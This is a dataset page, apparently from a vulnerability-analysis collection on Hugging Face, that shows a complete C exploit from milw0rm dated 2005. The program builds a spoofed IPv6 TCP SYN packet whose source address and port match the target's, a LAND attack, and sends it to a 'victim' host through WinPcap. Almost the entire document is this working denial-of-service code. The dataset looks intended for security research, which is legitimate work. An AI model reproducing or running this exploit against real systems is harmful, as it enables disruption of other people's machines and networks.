Team Ai
Modelpublic

lilbool/vuln-code-analysis

sourceHugging Facemitupdated 2y agoView on Hugging Face
0likes
exploit_1000.txt243 linesDownload Raw Back to exploits
1//

2// Example usage: LandIpV6 \Device\NPF_{B1751317-BAA0-43BB-A69B-A0351960B28D} 

3//fe80::2a1:b0ff:fe08:8bcc 135

4//

5// Written by: Konrad Malewski.

6//

7

8#include <stdlib.h>

9#include <stdio.h>

10#include <Winsock2.h>

11#include <ws2tcpip.h>

12#include <pcap.h>

13#include <remote-ext.h>

14///////////////////////////////////////////////////////////////////////////////

15///////////// from libnet /////////////

16/* ethernet addresses are 6 octets long */

17#define ETHER_ADDR_LEN 0x6

18

19typedef unsigned char u_int8_t;

20typedef unsigned short u_int16_t;

21typedef unsigned int u_int32_t;

22typedef unsigned __int64 u_int64_t;

23/*

24* Ethernet II header

25* Static header size: 14 bytes

26*/

27struct libnet_ethernet_hdr

28{

29u_int8_t ether_dhost[ETHER_ADDR_LEN];/* destination ethernet address */

30u_int8_t ether_shost[ETHER_ADDR_LEN];/* source ethernet address */

31u_int16_t ether_type; /* protocol */

32};

33

34struct libnet_in6_addr

35{

36union

37{

38u_int8_t __u6_addr8[16];

39u_int16_t __u6_addr16[8];

40u_int32_t __u6_addr32[4];

41} __u6_addr; /* 128-bit IP6 address */

42};

43

44

45/*

46* IPv6 header

47* Internet Protocol, version 6

48* Static header size: 40 bytes

49*/

50struct libnet_ipv6_hdr

51{

52u_int8_t ip_flags[4]; /* version, traffic class, flow label */

53u_int16_t ip_len; /* total length */

54u_int8_t ip_nh; /* next header */

55u_int8_t ip_hl; /* hop limit */

56struct libnet_in6_addr ip_src, ip_dst; /* source and dest address */

57

58};

59

60/*

61* TCP header

62* Transmission Control Protocol

63* Static header size: 20 bytes

64*/

65struct libnet_tcp_hdr

66{

67u_int16_t th_sport; /* source port */

68u_int16_t th_dport; /* destination port */

69u_int32_t th_seq; /* sequence number */

70u_int32_t th_ack; /* acknowledgement number */

71u_int8_t th_x2:4, /* (unused) */

72th_off:4; /* data offset */

73

74u_int8_t th_flags; /* control flags */

75u_int16_t th_win; /* window */

76u_int16_t th_sum; /* checksum */

77u_int16_t th_urp; /* urgent pointer */

78};

79

80int libnet_in_cksum(u_int16_t *addr, int len)

81{

82int sum;

83union

84{

85u_int16_t s;

86u_int8_t b[2];

87}pad;

88sum = 0;

89while (len > 1)

90{

91sum += *addr++;

92len -= 2;

93}

94if (len == 1)

95{

96pad.b[0] = *(u_int8_t *)addr;

97pad.b[1] = 0;

98sum += pad.s;

99}

100return (sum);

101}

102#define LIBNET_CKSUM_CARRY(x) (x = (x >> 16) + (x & 0xffff), (~(x + (x >> 16)) 

103& 0xffff))

104

105///////////////////////////////////////////////////////////////////////////////

106///////////////////////////////////////////////////////////////////////////////

107u_char packet[74];

108struct libnet_ipv6_hdr *ip6_hdr = (libnet_ipv6_hdr *) (packet + 14);

109struct libnet_tcp_hdr *tcp_hdr = (libnet_tcp_hdr *) (packet + 54);

110struct libnet_ethernet_hdr *eth_hdr = (libnet_ethernet_hdr *) packet;

111

112u_char errbuf[1024];

113pcap_t *pcap_handle;

114

115

116void usage(char* n)

117{

118pcap_if_t * alldevs,*d;

119int i=1;

120fprintf(stdout,"Usage:\n"

121"\t %s <device> <victim> <port>\n",n);

122

123if (pcap_findalldevs (&alldevs, (char*)errbuf) == -1)

124{

125fprintf( stderr, "Error in pcap_findalldevs ():%s\n" ,errbuf);

126exit(EXIT_FAILURE);

127}

128printf("Avaliable adapters: \n");

129d = alldevs;

130while (d!=NULL)

131{

132printf("\t%d) %s\n\t\t%s\n",i++,d->name,d->description);

133d = d->next;

134}

135pcap_freealldevs (alldevs);

136}

137///////////////////////////////////////////////////////////////////////////////

138int main(int argc, char* argv[])

139{

140if ( argc<4 )

141{

142usage(argv[0]);

143return EXIT_FAILURE;

144}

145

146int retVal;

147struct addrinfo hints,*addrinfo;

148

149ZeroMemory(&hints,sizeof(hints));

150

151WSADATA wsaData;

152if ( WSAStartup( MAKEWORD(2,2), &wsaData ) != NO_ERROR )

153{

154fprintf( stderr, "Error in WSAStartup():%d\n",WSAGetLastError());

155return EXIT_FAILURE;

156}

157//

158// Get MAC address of remote host (assume link local IpV6 address)

159//

160

161hints.ai_family = PF_INET6;

162hints.ai_socktype = SOCK_STREAM;

163hints.ai_protocol = IPPROTO_TCP;

164hints.ai_flags = AI_PASSIVE;

165

166retVal = getaddrinfo(argv[2],0, &hints, &addrinfo);

167if ( retVal!=0 )

168{

169WSACleanup();

170fprintf( stderr, "Error in getaddrinfo():%d\n",WSAGetLastError());

171exit(EXIT_FAILURE);

172}

173

174//

175// Open WinPCap adapter

176//

177if ( (pcap_handle = pcap_open_live (argv[1], 1514, PCAP_OPENFLAG_PROMISCUOUS, 

178100, (char*)errbuf)) == NULL )

179{

180freeaddrinfo(addrinfo);

181WSACleanup();

182fprintf(stderr, "Error opening device: %s\n",argv[1]);

183return EXIT_FAILURE;

184}

185

186ZeroMemory(packet,sizeof(packet));

187struct sockaddr_in6 *sa = (struct sockaddr_in6 *) addrinfo->ai_addr;

188

189// fill ethernet header

190eth_hdr->ether_dhost[0] = eth_hdr->ether_shost[0] = 0;// assume address like 

19100:something;

192eth_hdr->ether_dhost[1] = eth_hdr->ether_shost[1] = sa->sin6_addr.u.Byte[9];

193eth_hdr->ether_dhost[2] = eth_hdr->ether_shost[2] = sa->sin6_addr.u.Byte[10];

194eth_hdr->ether_dhost[3] = eth_hdr->ether_shost[3] = sa->sin6_addr.u.Byte[13];

195eth_hdr->ether_dhost[4] = eth_hdr->ether_shost[4] = sa->sin6_addr.u.Byte[14];

196eth_hdr->ether_dhost[5] = eth_hdr->ether_shost[5] = sa->sin6_addr.u.Byte[15];

197eth_hdr->ether_type = 0xdd86;

198

199

200// fill IP header

201// source ip == destination ip

202

203memcpy(ip6_hdr->ip_src.__u6_addr.__u6_addr8,sa->sin6_addr.u.Byte,sizeof(sa->sin6_addr.u.Byte));

204

205memcpy(ip6_hdr->ip_dst.__u6_addr.__u6_addr8,sa->sin6_addr.u.Byte,sizeof(sa->sin6_addr.u.Byte));

206ip6_hdr->ip_hl = 255;

207ip6_hdr->ip_nh = IPPROTO_TCP;

208ip6_hdr->ip_len = htons (20);

209ip6_hdr->ip_flags[0] = 0x06 << 4;

210srand((unsigned int) time(0));

211// fill tcp header

212tcp_hdr->th_sport = tcp_hdr->th_dport = htons (atoi(argv[3])); // source 

213port equal to destination

214tcp_hdr->th_seq = rand();

215tcp_hdr->th_ack = rand();

216tcp_hdr->th_off = htons(5);

217tcp_hdr->th_win = rand();

218tcp_hdr->th_sum = 0;

219tcp_hdr->th_urp = htons(10);

220tcp_hdr->th_off = 5;

221tcp_hdr->th_flags = 2;

222// calculate tcp checksum

223int chsum = libnet_in_cksum ((u_int16_t *) & ip6_hdr->ip_src, 32);

224chsum += ntohs (IPPROTO_TCP + sizeof (struct libnet_tcp_hdr));

225chsum += libnet_in_cksum ((u_int16_t *) tcp_hdr, sizeof (struct 

226libnet_tcp_hdr));

227tcp_hdr->th_sum = LIBNET_CKSUM_CARRY (chsum);

228// send data to wire

229retVal = pcap_sendpacket (pcap_handle, (u_char *) packet, sizeof(packet));

230if ( retVal == -1 )

231{

232fprintf(stderr,"Error writing packet to wire!!\n");

233}

234//

235// close adapter, free mem.. etc..

236//

237pcap_close(pcap_handle);

238freeaddrinfo(addrinfo);

239WSACleanup();

240return EXIT_SUCCESS;

241}

242

243// milw0rm.com [2005-05-17]